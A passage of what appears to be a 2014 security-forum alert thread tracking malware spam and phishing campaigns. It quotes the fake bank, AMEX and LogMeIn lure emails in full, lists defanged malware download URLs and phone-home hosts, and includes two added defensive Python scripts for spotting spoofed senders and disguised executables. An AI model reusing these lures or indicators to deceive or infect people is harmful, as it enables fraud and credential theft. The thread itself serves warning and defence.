Current Virus total detections: 5/55* . This 'TNT UK Limited Package tracking' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411121703/
... Behavioural information
DNS requests
hallerindia .com (192.185.97.223)
TCP connections
188.165.204.210: https://www.virustot...10/information/
192.185.97.223: https://www.virustot...23/information/
___

Bitcoin Ponzi scheme ...
- http://www.reuters.c...N0HE1Z820140919
Sep 19, 2014 - "A U.S. federal judge in Texas ordered Bitcoin Savings and Trust and its owner to pay a combined $40.7 million after the Securities and Exchange Commission established that the company, which sold investments using the virtual currency, was a Ponzi scheme. In a decision dated Thursday, U.S. Magistrate Judge Amos Mazzant said Trendon Shavers "knowingly and intentionally" operated his company "as a sham and a Ponzi scheme," misleading investors about the use of their bitcoin, how he would generate promised returns and the safety of their investments... The SEC said Shavers used the online moniker "pirateat40" to raise more than 732,000 bitcoin from February 2011 to August 2012, promising investors up to 7 percent in weekly interest to be paid based on his ability to trade the currency. But according to the decision, Shavers used new bitcoin to repay earlier investors, diverted some to personal accounts at the now-bankrupt Mt. Gox exchange and elsewhere, and spent some investor funds on rent, food, shopping and casino visits..."
___

Apple Phish ...
- https://isc.sans.edu...l?storyid=18669
2014-09-18 23:58:53 UTC - "... this in this morning:
Dear Client,
We inform you that your account is about to expire in less 48 hours, it's imperative to update your information with our audit forms, otherwise your session and/or account will be a limited access.
just click the link below and follow the steps our request form
Update now...
This is an automatically generated message. Thank you not to answer.  If you need help, please visit the Apple Support.
Apple Client Support.


A variation on the -many- phishing emails we see regularly, just taking advantage of two public events, the celebrity photos and the release of the new phone. Maybe a reminder to staff as well as friends and family to -ignore- emails that say "click here" ..."
___

Hack the ad network like a boss...
- https://www.virusbtn.../2014/08_15.xml
4 Sep 2014 - "... Exploit kits have been the scourge of the web for many years. Typically starting with a single line of inserted code, they probe for a number of vulnerabilities in the browser or its plug-ins and use this to drop malware onto the victim's machine. Given the high proportion of Internet users that haven't fully patched their systems, it is a successful way to spread malware.
> https://www.virusbtn...licious_ads.png
... in order for exploit kits to do their work, a vulnerable website must first be infected, or the user must be enticed into clicking a malicious link. But by purchasing ad space, and using this to place malicious ads, attackers have discovered a cheap and effective way to get their malicious code to run inside the browser of many users. They can even tailor their advertisements to target specific languages, regions or even website subjects... We learned last month that this is a serious problem - when researchers found that cybercriminals had purchased advertising space on Yahoo in order to serve the 'Cryptowall' ransomware.
> https://www.virusbtn...licious_ads.png
Ideally... advertising networks would block malicious ads as they are added to their systems... this is easier said than done: given the size of such networks, it would take a lot of time and resources - plus, technically, it's difficult to block most malicious ads without a certain percentage of false positives..."
 

:grrr:  :ph34r:


Edited by AplusWebMaster, 20 September 2014 - 05:34 AM.

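The spoofed-sender mails quoted in this post (a "voice mail" whose From address is forged as the recipient's own domain, the Apple phish that just says "click here") share two tells that a mail gateway or an analyst can check mechanically: the From domain disagrees with the envelope sender and the relay that handed the mail over, and the link text shows one host while the href points at another. The script below is an added example written for this thread, not code from the thread or from the blogs it quotes. The two raw messages, and every address and host in them (`victimdomain.example`, `mailer.example.net`, `malicious-host.example`), are constructed placeholders; `sender_findings`, `deceptive_links` and `message_links` are names chosen here.

```python
"""Header and link consistency checks for spoofed-sender mail.

Added example (not from the thread or the quoted blogs). The sample
messages and all hosts/addresses in them are constructed placeholders.
"""
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample modelled on the fake 'voice mail' spam quoted above:
# display name "Microsoft Outlook", From forged as the recipient's own
# domain, but envelope sender and relay are external, and the link text
# shows a dropbox URL while the href points elsewhere.
SPOOFED_MAIL = """\
Return-Path: <bounce@mailer.example.net>
Received: from mailer.example.net (mailer.example.net [192.0.2.10])
 by mx.victimdomain.example (Postfix) with ESMTP id 4B1C2D3E
 for <user@victimdomain.example>; Fri, 19 Sep 2014 11:59:00 +0100
From: Microsoft Outlook <no-reply@victimdomain.example>
To: user@victimdomain.example
Subject: You have received a voice mail
Content-Type: text/html; charset=us-ascii

<p>You received a voice mail : VOICE976-588-6749.wav (25 KB)</p>
<p><a href="http://malicious-host.example/dl/VoiceMail.zip">https://www.dropbox.com/voicemail</a></p>
<p><a href="http://malicious-host.example/unsub">Unsubscribe</a></p>
"""

# Constructed legitimate counterpart: envelope, From and relay all agree.
CLEAN_MAIL = """\
Return-Path: <no-reply@victimdomain.example>
Received: from mail.victimdomain.example (mail.victimdomain.example [198.51.100.5])
 by mx.victimdomain.example (Postfix) with ESMTP id 5C2D3E4F
 for <user@victimdomain.example>; Fri, 19 Sep 2014 12:05:00 +0100
From: IT Helpdesk <no-reply@victimdomain.example>
To: user@victimdomain.example
Subject: Planned maintenance
Content-Type: text/html; charset=us-ascii

<p>See <a href="https://intranet.victimdomain.example/status">intranet.victimdomain.example/status</a></p>
"""

HOSTNAME_TEXT = re.compile(r"^(?:https?://)?[\w.-]+\.[a-z]{2,}(?:/\S*)?$", re.I)
ANCHOR = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)


def _domain(header_value):
    """Lower-cased domain of the first address in a header value."""
    _, addr = parseaddr(header_value or "")
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def _same_or_sub(host, domain):
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def sender_findings(raw_message):
    """Describe inconsistencies between From, Return-Path and the handing-off relay."""
    msg = message_from_string(raw_message)
    from_dom = _domain(msg.get("From"))
    rp_dom = _domain(msg.get("Return-Path"))
    to_dom = _domain(msg.get("To"))
    findings = []
    if rp_dom and from_dom and rp_dom != from_dom:
        findings.append(f"Return-Path domain {rp_dom} differs from From domain {from_dom}")
    if from_dom and from_dom == to_dom and rp_dom and rp_dom != to_dom:
        findings.append(f"From claims our own domain {from_dom} but the envelope sender is external")
    # The first Received header is the one our MX added: the host that handed us the mail.
    received = msg.get_all("Received") or []
    if received:
        m = re.search(r"from\s+(\S+)", received[0])
        if m and from_dom and not _same_or_sub(m.group(1), from_dom):
            findings.append(f"delivered by {m.group(1)}, which is not a {from_dom} host")
    return findings


def deceptive_links(html):
    """(visible text, href) pairs whose visible host differs from the real target host."""
    out = []
    for href, text in ANCHOR.findall(html):
        text = re.sub(r"<[^>]+>", "", text).strip()
        if not HOSTNAME_TEXT.match(text):
            continue  # plain words such as "Unsubscribe" make no claim about the host
        shown = urlparse(text if "://" in text else "http://" + text).hostname
        target = urlparse(href).hostname
        if shown and target and shown.lower() != target.lower():
            out.append((text, href))
    return out


def message_links(raw_message):
    """Run deceptive_links over the (non-multipart) HTML body of a raw message."""
    msg = message_from_string(raw_message)
    body = msg.get_payload(decode=True) or b""
    return deceptive_links(body.decode(msg.get_content_charset() or "utf-8", "replace"))


if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED_MAIL), ("clean", CLEAN_MAIL)):
        print(label, sender_findings(raw), message_links(raw))
```

The relay check reads only the outermost Received header, the one added by your own MX, because every header below it was written by the sender and can say anything. On real traffic the From/Return-Path mismatch alone is noisy (mailing lists and bulk senders do it legitimately), so treat the three findings together as a score rather than a verdict.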


#1284 AplusWebMaster


Posted 22 September 2014 - 06:51 AM

FYI...

Fake gov't SPAM
- http://blog.dynamoo....ssion-spam.html
22 Sep 2014 - "This -fake- spam from the UK Government Gateway leads to malware:

Screenshot: https://4.bp.blogspo...600/gateway.png

The link in the email does -not- go to gateway .gov.uk at all, but in this case the link goes to the following:
http ://maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://www .maedarchitettura .it/wfntvkppqi/wnazvamlzv.html ->
http ://maedarchitettura .it/wfntvkppqi/GatewaySubmission.zip
The ZIP file contains a malicious executable GatewaySubmission.exe which has a VirusTotal detection rate of 1/55*. The Anubis report** shows that it attempts to make a connection to ruralcostarica .com which is probably worth blocking."
* https://www.virustot...sis/1411383282/

 

184.168.152.32: https://www.virustot...32/information/

** https://anubis.isecl...f82&format=html

- http://myonlinesecur...ke-pdf-malware/
22 Sep 2014
Screenshot: http://myonlinesecur...-Submission.png
...
> https://www.virustot...sis/1411381013/
___

Fake 'LogMeIn' SPAM – malware
- http://myonlinesecur...update-malware/
22 Sep 2014 - "'September 22, 2014 LogMeIn Security Update' pretending to come from LogMeIn .com <auto-mailer@ logmein .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Dear client,
    We are pleased to announce that LogMeIn has released a new security certificate.
    It contains new features:
    •    The certificate will be attached to the computer of the account holder, which will prevent any fraud activity
    •    Any irregular activity on your account will be detected by our security department
    •       This SSL security certificate patches the “Heartbleed” bug discovered earlier this year
    Download the attached certificate. Update will be automatically installed by double click.
    As always, your Logmein Support Team is happy to assist with any questions you may have.
    Feel free to contact us ...


22 September 2014: cert_client.zip (66 kb): Extracts to: cert.scr
Current Virus total detections: 2/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a large blue i instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411400614/
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205)
www .download .windowsupdate .com (95.101.0.104): https://www.virustot...04/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustot...20/information/
TCP connections
23.253.218.205: https://www.virustot...05/information/
95.101.0.83: https://www.virustot...83/information/
38.229.70.4: https://www.virustot....4/information/

- https://isc.sans.edu...l?storyid=18695
2014-09-22
Screenshot: https://isc.sans.edu...11_34_06 AM.png
...
> https://www.virustot...b0c3b/analysis/
File name: cert.scr.exe
Detection ratio: 3/51
... Behavioural information
DNS requests
icanhazip .com (23.253.218.205): https://www.virustot...05/information/
www .download.windowsupdate .com (95.101.0.104): https://www.virustot...04/information/
t54cjs4qc2r4bn63 .tor2web .org (65.112.221.20): https://www.virustot...20/information/
TCP connections
23.253.218.205: https://www.virustot...05/information/
95.101.0.83: https://www.virustot...83/information/
38.229.70.4: https://www.virustot....4/information/
___

Fake USAA SPAM - PDF malware
- http://myonlinesecur...ds-pdf-malware/
22 Sep 2014 - "'USAA Policy Renewal – Please Print Auto ID Cards' pretending to come from USAA <USAA.Web.Services@customermail.usaa.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecur...to-ID-Cards.png

22 September 2014: id_card.pdf - Current Virus total detections: 11/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1411415107/

- http://threattrack.t...rance-card-spam
23 Sep 2014
Screenshot: https://gs1.wac.edge...1ERc1r6pupn.png
Tagged: USAA, CVE-2013-2729, Upatre, PDFExploit
___

Fake 'RBC Invoice' SPAM – PDF malware
- http://myonlinesecur...es-pdf-malware/
22 Sep 2014 - "'RBC Invoices' pretending to come from RBC Express <ISVAdmin@ rbc .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Please review the attached invoices and pay them at your earliest convenience. Feel free to contact us if you have any questions.
    Thank you.


22 September 2014: invoice058342.pdf . Current Virus total detections: 10/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1411409482/
___

Fake 'Payment Advice' SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
22 Sep 2014 - "'HSBC Payment Advice Issued' pretending to come from HSBC Bank UK <payment.advice@ hsbc .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment or follow the link in the email... The email looks like:
    Your payment advice is issued at the request of our customer. The advice is for your reference only.
     Please download your payment advice at ...
     Yours faithfully,
    Global Payments and Cash Management
    This is an auto-generated email, please DO NOT REPLY. Any replies to this email will be disregarded.


... this drops a slightly different malware paymentadvice .exe with a current VT detections 0/53* . This HSBC Payment Advice Issued is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411386112/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Invoice SPAM
- http://myonlinesecur...ke-pdf-malware/
22 Sep 2014 - "'PETER HOGARTH & SONS LTD Invoice 642555' pretending to come from john.williamson@ peterhogarth .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Please find attached your Invoice(s)/Credit(s)
    PETER HOGARTH & SONS LTD
    INDUSTRIAL HYGIENE and PROTECTION
    Tel: 01472 345726 | Fax: 01472 250272 | Web...
    Estate Road No. 5, South Humberside Industrial Estate, Grimsby, North East Lincolnshire, DN31 2UR
    Peter Hogarth & Sons Ltd is a company registered in England.
    Company Registration Number: 1143352...


22 September 2014: Attachment.zip (230 kb): Extracts to: Invoice 77261990001.PDF.exe
Current Virus total detections: 3/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411380202/
___

European banks / Europol in cybercrime fightback
- http://www.reuters.c...N0RN1WO20140922
Sep 22, 2014 - "Europe's banks have joined forces with Europol's cybercrime unit to try to combat the rising and increasingly sophisticated threat being posed by cyber criminals to financial firms. The European Banking Federation (EBF), which represents about 4,500 banks, and Europol's European Cybercrime Centre - known as EC3 - said on Monday they had signed a memorandum of understanding to intensify cooperation between law enforcement and the financial sector. Banks are facing frequent attacks from sophisticated hackers. Wall Street bank JP Morgan said last month it was working with U.S. law enforcement authorities to investigate a possible cyber attack, and Royal Bank of Scotland and its UK peers have suffered serious attacks by hackers that have disrupted systems... Cybercrime attacks faced by banks include coordinated attempts to disrupt websites, payment card fraud, and attempts to infiltrate systems to steal money. The agreement between the EBF, which is a federation of 32 national banking lobby groups, and EC3, which links cybercrime divisions of police forces in EU countries, will allow them to exchange know-how, statistics and strategic information. Banks are typically working closely with national police forces to fight cybercrime, and the new agreement should widen that across Europe..."
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 23 September 2014 - 08:46 AM.

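Nearly every attachment in the posts above is the same trick: an archive holding an executable whose name ends in a document-like extension (`.PDF.exe`, `_pdf.exe`, `.xls.scr`) or a bare `.scr`, relying on Explorer hiding known extensions and on a spoofed icon. A gateway or a triage script can refuse such archives without any AV signature. The following is an added example for this thread, not code from the thread or from the blogs it quotes; it checks ZIP members only (the `.rar` used by the 'overdue invoice' run needs a separate library), the archive it scans is built in memory from constructed members with a fake two-byte `MZ` payload, and `classify_name`, `scan_zip` and `build_sample_zip` are names chosen here.

```python
"""Flag disguised executables inside a ZIP attachment.

Added example (not from the thread or the quoted blogs). The archive is
built in memory from constructed members; the member names imitate the
patterns seen in the posts above (bare .scr, name.PDF.exe, name_pdf.exe,
executable inside a folder named like a spreadsheet).
"""
import io
import zipfile
from pathlib import PurePosixPath

# Extensions Windows runs on double-click; Explorer hides the last one when
# "show known file extensions" is off, which is what the spoofed icons rely on.
EXEC_EXT = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".jse",
            ".vbs", ".vbe", ".wsf", ".hta", ".cpl"}
# Harmless-looking extensions the malware names borrow.
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".wav", ".mp3", ".jpg",
           ".txt", ".htm", ".html"}


def classify_name(member_name):
    """Reason string if the member name looks like a disguised executable, else None."""
    path = PurePosixPath(member_name)
    suffixes = [s.lower() for s in path.suffixes]
    if not suffixes or suffixes[-1] not in EXEC_EXT:
        return None
    last = suffixes[-1]
    if len(suffixes) > 1 and suffixes[-2] in DOC_EXT:
        return f"double extension {suffixes[-2]}{last}"
    stem = path.stem.lower()  # final component without the executable suffix
    hint = next((d[1:] for d in DOC_EXT
                 if stem.endswith(("_" + d[1:], "-" + d[1:]))), None)
    if hint:
        return f"executable extension {last} named like a {hint}"
    return f"executable extension {last}"


def has_pe_header(first_bytes):
    """True for the 'MZ' magic every Windows PE file starts with."""
    return first_bytes[:2] == b"MZ"


def scan_zip(zip_bytes):
    """Return [(member, [reasons])] for members that should not be opened."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = []
            name_reason = classify_name(info.filename)
            if name_reason:
                reasons.append(name_reason)
            with zf.open(info) as fh:
                head = fh.read(2)
            # Content check catches an executable hiding behind an innocent name too.
            if has_pe_header(head):
                reasons.append("PE header (MZ) in content")
            if reasons:
                findings.append((info.filename, reasons))
    return findings


def build_sample_zip():
    """Constructed archive: five hostile members and one harmless text file."""
    fake_pe = b"MZ" + b"\x90" * 62  # just the magic bytes, not a real program
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("fax-id9182719182837529.scr", fake_pe)
        zf.writestr("Invoice 77261990001.PDF.exe", fake_pe)
        zf.writestr("Label_GB1909201488725UK_pdf.exe", fake_pe)
        zf.writestr("quote_1234.xls/quote_1234.xls.scr", fake_pe)
        zf.writestr("statement.pdf", fake_pe)  # innocent name, executable content
        zf.writestr("readme.txt", b"plain text")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in scan_zip(build_sample_zip()):
        print(f"{member}: {'; '.join(reasons)}")
```

The name check and the content check are deliberately independent: the name catches the social-engineering pattern even when the payload is a downloader with no PE header yet (a script or a shortcut), and the `MZ` check catches a renamed executable that a later run might ship under a clean-looking name.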


#1285 AplusWebMaster


Posted 23 September 2014 - 05:42 AM

FYI...

Fake 'Voice Mail' SPAM
- http://blog.dynamoo....u-have-new.html
23 Sep 2014 - "This strangely titled spam leads to malware.
From:     Voice Mail
Date:     23 September 2014 10:17
Subject:     You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs8213783583_001
The transmission length was 78
Receiving machine ID : R8KU-UY0G3-ONGH
To download and listen your voice mail please follow the link ...
The link to this secure message will expire in 24 hours ...


The link in the email downloads a file from www .ezysoft .in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54*. According to this Anubis report** the malware attempts to phone home to very-english .co.uk which might be worth blocking."
* https://www.virustot...sis/1411464313/

** http://anubis.isecla...27a&format=html

- http://myonlinesecur...ke-pdf-malware/
23 Sep 2014 - "... 23 Sep 2014: VoiceMail.zip (9kb): Extracts to: VoiceMail.scr  Current Virus total detections: 2/54*
* https://www.virustot...sis/1411464313/
___

jQuery.com compromised to serve malware via drive-by download
- http://www.net-secur...ews.php?id=2869
23.09.2014 - "jQuery.com, the official website of the popular cross-platform JavaScript library of the same name, had been compromised and had been -redirecting- visitors to a website hosting the RIG exploit kit and, ultimately, delivering information-stealing malware. While any website compromise is dangerous for users, this one is particularly disconcerting because of the demographic of its users... The attack was first detected on September 18, and given that the malicious redirector was hosted on a domain that was registered on the same day, it's more than likely that that was the day when the attack actually started. RiskIQ researchers* have immediately notified the jQuery Foundation about the compromise, and the site's administrators have -removed- the malicious script. The bad news is that they still don't know how the compromise happened, so it just might happen again. Users who have visited the site on or around September 18 are advised to check whether they have been compromised by the malware. The researchers recommend immediately re-imaging the system, resetting passwords for user accounts that have been used on it, and checking whether suspicious activity has originated from it (data exfiltration, etc.). The only good news in all of this is that there is no indication that the jQuery library was affected."
* http://www.riskiq.co...t-accounts-risk

>> https://blog.malware...RIG exploit kit

- https://isc.sans.edu...l?storyid=18699
2014-09-23

46.182.31.77: https://www.virustot...77/information/
___

Nuclear Exploit Kit evolves, includes Silverlight Exploit
- http://blog.trendmic...rlight-exploit/
Sep 23, 2014 - "... We observed that the Nuclear Exploit Kit recently included the Silverlight exploit (CVE-2013-0074*) in its scope. We believe that the attackers behind the Nuclear Exploit Kit included Silverlight in its roster of targeted software for two reasons: to have an expanded attack surface and to avoid detection (as not many security solutions have detections for this particular exploit)... This particular exploit has also been used in other exploit kits, such as the Angler Exploit Kit... Microsoft has released a bulletin (Microsoft Security Bulletin MS13-022) to address the associated vulnerability... The number of exploits used by the kit has -doubled- since the start of 2014...
Timeline of exploits used by the Nuclear Exploit Kit:
> http://blog.trendmic...Timeline-01.jpg
Vulnerabilities targeted by the current Nuclear Exploit Kit:
> http://blog.trendmic...xploit_fig4.png
... patches have already been released for the vulnerabilities targeted by the Nuclear Exploit Kit..."
* https://web.nvd.nist...d=CVE-2013-0074 - 9.3 (HIGH)
 

:grrr:  :ph34r:


Edited by AplusWebMaster, 24 September 2014 - 07:37 AM.



#1286 AplusWebMaster


Posted 24 September 2014 - 05:20 AM

FYI...

Fake BankLine SPAM
- http://blog.dynamoo....re-message.html
24 Sep 2014 - "This -fake- BankLine email leads to malware that is not currently detected by any anti-virus engine:
    From:     Bankline [secure.message@ bankline .com]
    Date:     24 September 2014 09:59
    Subject:     You have received a new secure message from BankLine
    You have received a secure message.
    Read your secure message by following the link bellow ...
    You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
    If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk ...
    First time users - will need to register after opening the attachment...


The link in the email goes to ismashahalam .net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam .net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50*. The Anubis report** shows that the malware phones home to very-english .co.uk which is worth blocking or monitoring."
* https://www.virustot...sis/1411546325/

** https://anubis.isecl...3ef&format=html

- http://myonlinesecur...ke-pdf-malware/
24 Sep 2014 - "... 24 Sep 2014: SecureMessage.zip: Extracts to: SecureMessage.scr
Current Virus total detections: 7/54*..."
* https://www.virustot...sis/1411565004/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake Voice mail SPAM
- http://myonlinesecur...ke-wav-malware/
24 Sep 2014 - "'Voice Message Attached from 01636605058 – name unavailable' pretending to come from voicemail@ inclarity .net is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     Time: Sep 23, 2014 10:50:00 AM
    Click attachment to listen to Voice Message


24 September 2014: 01636605058_20140919_105000.wav.zip: Extracts to:   01636605058_20140919_105000.wav.exe
Current Virus total detections: 12/53*
This 'Voice Message Attached from 01636605058 – name unavailable' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411568872/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustot...11/information/
___

Fake 'overdue invoice' SPAM – malware
- http://myonlinesecur...nvoice-malware/
24 Sep 2014 - "'Reminder of overdue invoice' pretending to come from a random name at a random company and with a random named attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... different subjects with this one having different numbers including:
    Reminder of overdue invoice: 708872110964932
    Overdue Payment: 122274492356288
    Due Date E-Mail Reminder: 417785972641224
    Payment reminder: 461929101577209
    Past Due Reminder Letter: 199488661953143
    Bills Reminder: 325332051074690
    Automatic reminder: 676901889653218
    Late payment: 475999033756578
    Reminder: 215728756825356

The email looks like:
    Hello,
     This is Rex from Olympus Industrial. After a review of our records, we have found your account is past due.
    Account ID: 5FCDMF9. This notice is a reminder your payment is due.
     Regards,
    Rex Gloeckler
    Olympus Industrial...


24 September 2014: application_708872110964932_5FCDMF9.rar:
Extracts to: application_708872110964932_5FCDMF9.exe
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411570178/
... Behavioural information
TCP connections
157.56.96.53: https://www.virustot...53/information/
213.186.33.19: https://www.virustot...19/information/
95.101.0.97: https://www.virustot...97/information/
213.186.33.17: https://www.virustot...17/information/
195.60.214.11: https://www.virustot...11/information/
___

Fake AMEX Phish - 'Home Depot Security concern'
- http://myonlinesecur...depot-phishing/
24 Sep 2014 - "We are seeing quite a few American Express phishing attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. Do -not- click -any- links in these emails... Today’s version is the 'American Express – Security concern on Data breach at Home Depot' which is a change to previous versions to attempt to make it more believable and attractive for you to click the link & give your details. They are using the recent Home Depot hack and consequent fraudulent transactions* that are being taken from many victims accounts to scare you into ignoring the usual precautions and get you to give them your details:
* http://www.cnbc.com/id/102027452
Email looks like:
[ AMEX logo ]
Dear Customer:We are writing to you because we need to speak with you regarding a security concern on your account. The Home Depot recently reported that there was unauthorized access to payment data systems at its U.S. stores. American Express has put fraud controls in place and we continue to closely monitor the situation. Our records indicate that you recently used your American Express card on September 19, 2014.
We actively monitor accounts for fraud, and if we see unusual activity which may be fraud, our standard practice is to immediately contact our Card Members. There is no need to call us unless you see suspicious activity on your account.
To ensure the safety of your account , please log on to : ...
    Regularly monitor your transactions online at americanexpress .com. If you notice fraudulent transactions, visit our online Inquiry and Dispute Center
    Enroll in Account Alerts that notify you via email or text messages about potentially fraudulent activities.
    Switch to Paperless Statements that are accessible online through your password-protected account.
Your prompt response regarding this matter is appreciated.
Sincerely,
American Express Identity Protection Team ...


Following the link in this 'American Express – Security concern on Data breach at Home Depot' or other -spoofed- emails takes you to a website that looks -exactly- like the real American Express site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. Please read our How to protect yourselves page** for simple, sensible advice on how to avoid being infected  or having your details stolen by this sort of socially engineered malware..."
** http://myonlinesecur...ghten-security/

- http://threattrack.t...edentials-phish
Sep 24, 2014
Screenshot: https://gs1.wac.edge...KPiQ1r6pupn.png
Tagged: AMEX, American Express, Home Depot, Credentials Phish
___

Netcraft Sep 2014 Web Server Survey
- http://news.netcraft...ver-survey.html
24 Sep 2014 - "In the September 2014 survey we received responses from 1,022,954,603 sites — nearly 31 million more than last month. This is the first time the survey has exceeded a -billion- websites, a milestone achievement that was unimaginable two decades ago. Netcraft's first ever survey was carried out over 19 years ago in August 1995. That survey found only 18,957 sites, although the first significant milestone of one million sites was reached in less than two years, by April 1997..."
___

Viator(dot)com - Data Compromise ...
- https://blog.malware...e-you-affected/
Sep 23, 2014 - "You may well be seeing an email appearing in your inbox from Viator .com, a website designed to help you find tours and trips overseas with none of the typical messing about such tasks usually involve. The emails have been sent out because it appears they had a breach* and anything up to 1.4 million customers may have been potentially impacted by the compromise...
* http://www.viator.co...eleases/pr33251
Sep 19, 2014

... the bad news is that the breach took place a good few weeks ago yet we’re only just hearing about it... there doesn’t appear to have been a massive file posted online yet containing data such as PII related to the compromise... we await more information on this latest high-profile attack."
___

Malvertising campaign - involving DoubleClick and Zedo
- https://blog.malware...click-and-zedo/
Sep 18, 2014
Update (09/19/14 9:20 AM PT): It appears that the malicious redirection has stopped. Last activity was detected by our honeypots around midnight last night, and nothing else since then. We are still monitoring the situation and will update here if necessary."

- http://arstechnica.c...ached-millions/
Sep 22 2014


Edited by AplusWebMaster, 24 September 2014 - 09:34 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1287 AplusWebMaster


Posted 25 September 2014 - 07:21 AM

FYI...

Fake Bank transfers/invoice SPAM ...
- http://blog.dynamoo....nsfer-sage.html
25 Sep 2014 - "... very aggressive spam run this morning, with at least -four- different email formats pushing the -same- malicious download.

RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
    From:     Riley Crabtree [creditdepart@ rbs .co.uk]
    Date:     25 September 2014 10:58
    Subject:     BACS Transfer : Remittance for JSAG814GBP
    We have arranged a BACS transfer to your bank for the following amount : 4946.00
    Please find details at our secure link ...

 Sage Account & Payroll: "Outdated Invoice"
    From:     Sage Account & Payroll [invoice@ sage .com]
    Date:     25 September 2014 10:53
    Subject:     Outdated Invoice
    Sage Account & Payroll
    You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link ...

Screenshot: https://1.bp.blogspo...s1600/sage2.png

  Lloyds Commercial Bank: "Important - Commercial Documents"
    From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date:     25 September 2014 11:36
    Subject:     Important - Commercial Documents
    Important account documents
    Reference: C400
    Case number: 05363392
    Please review BACs documents.
    Click link below ...

 NatWest Invoice: "Important - New account invoice"
    From:     NatWest Invoice [invoice@ natwest .com]
    Date:     25 September 2014 10:28
    Subject:     Important - New account invoice
    Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
    To view/download your invoice please click here ...


